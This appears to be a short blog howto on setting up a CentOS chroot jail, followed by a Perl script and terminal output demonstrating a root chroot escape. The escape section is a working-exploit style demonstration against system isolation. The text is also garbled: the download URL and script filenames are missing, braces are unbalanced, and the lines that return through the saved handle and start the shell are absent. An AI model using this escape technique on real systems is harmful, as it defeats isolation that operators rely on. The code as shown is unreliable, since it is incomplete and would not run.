Here is a small howto on making chroot jail in RHEL/CentOS. In the end of article is a little script which shows how chroot jail can be broken.
Getting CentOS release file
wget -c
Creating a directory where your chroot jail will be set
mkdir -p /usr/local/chroot
Installing CentOS release file in your chroot jail path
rpm -i --root=/usr/local/chroot --nodeps centos-release-6-3.el6.centos.9.x86_64.rpm
This is needed in RHEL, copy CentOS RPM gpg keys to your current system
cp /usr/local/chroot/etc/pki/rpm-gpg/*CentOS* /etc/pki/rpm-gpg/
Install yum (this will install necessary BaseOS prerequisites as well)
yum --noplugins --installroot=/usr/local/chroot install yum -y
Copy standard user files to the root directory
cp /usr/local/chroot/etc/skel/.??* /usr/local/chroot/root
Consider copying resolv.conf file in case you want to access network from your chroot jail
cp /etc/resolv.conf /usr/local/chroot/etc/resolv.conf
Optional: Bind /proc and /dev to your chroot jail
mount --bind /proc /usr/local/chroot/proc
mount --bind /dev /usr/local/chroot/dev
Finally you can chroot into your chroot jail
chroot /usr/local/chroot /bin/bash -l
When finish working in chroot jail, do not forget to umount your /dev and /proc binds
umount /usr/local/chroot/dev
umount /usr/local/chroot/proc
Here is a little perl script that breaks this chroot jail. Note: This can be done only under root (id:0) user.
[root@laptop ~]# cat
#!/usr/bin/perl -w
use strict;
# Dec 2007
# This script may be used for legal purposes only.
# Go to the root of the jail
chdir "/";
# Open filehandle to root of jail
opendir JAILROOT, "." or die "ERROR: Couldn't get file handle to root of jailn";
# Create a subdir, move into it
mkdir "mysubdir";
chdir "mysubdir";
# Lock ourselves in a new jail
chroot ".";
# Use our filehandle to get back to the root of the old jail
# Get to the real root
while ((stat("."))[0] != (stat(".."))[0] or (stat("."))[1] != (stat(".."))[1]) {
chdir "..";
#foreach my $count (1..100) {
# chdir "..";
# Lock ourselves in real root - so we're not really in a jail at all now
chroot ".";
# Start an un-jailed shell
And the example demonstrating above script in action
[root@laptop ~]# df -h /
df: Warning: cannot read table of mounted file systems: No such file or directory
Filesystem Size Used Avail Use% Mounted on
- 286G 42G 242G 15% /
[root@laptop ~]# ./
sh-4.1# df -h /
Filesystem Size Used Avail Use% Mounted on
286G 42G 242G 15% /
Hooah! We broke the jail.